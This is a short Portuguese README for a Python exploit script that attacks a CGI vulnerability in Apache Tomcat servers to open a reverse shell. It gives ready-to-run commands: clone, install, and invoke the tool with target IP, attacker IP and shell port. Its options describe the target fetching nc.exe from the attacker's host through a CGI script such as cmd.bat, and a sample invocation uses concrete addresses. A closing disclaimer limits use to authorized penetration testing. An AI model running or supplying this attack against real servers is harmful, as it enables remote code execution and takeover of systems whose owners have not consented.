
Um script em Python projetado para explorar vulnerabilidades CGI em servidores Apache Tomcat por meio da execução de uma conexão de shell reverso.

requestsgit clone <url-do-repositorio>
cd <diretorio-do-repositorio>
pip install requests
python3 tomcat_cgi_exploit.py -t <IP_ALVO> -i <IP_ATACANTE> -ncp <PORTA_SHELL_REVERSO>
-t, --target: Endereço IP do alvo com Apache Tomcat-i, --ip: Endereço IP do atacante que hospeda o nc.exe-ncp, --nc-port: Porta para a conexão do shell reverso-p, --port: Porta do alvo (padrão: 8080)-sp, --server-port: Porta do servidor para hospedar o nc.exe (padrão: 80)-cgi, --cgi-script: Nome do script CGI a ser explorado (padrão: cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
Esta ferramenta é fornecida apenas para fins educacionais e testes de penetração autorizados. O autor e os colaboradores não são responsáveis por qualquer uso indevido ou dano causado por este script. Sempre obtenha autorização adequada antes de testar qualquer sistema.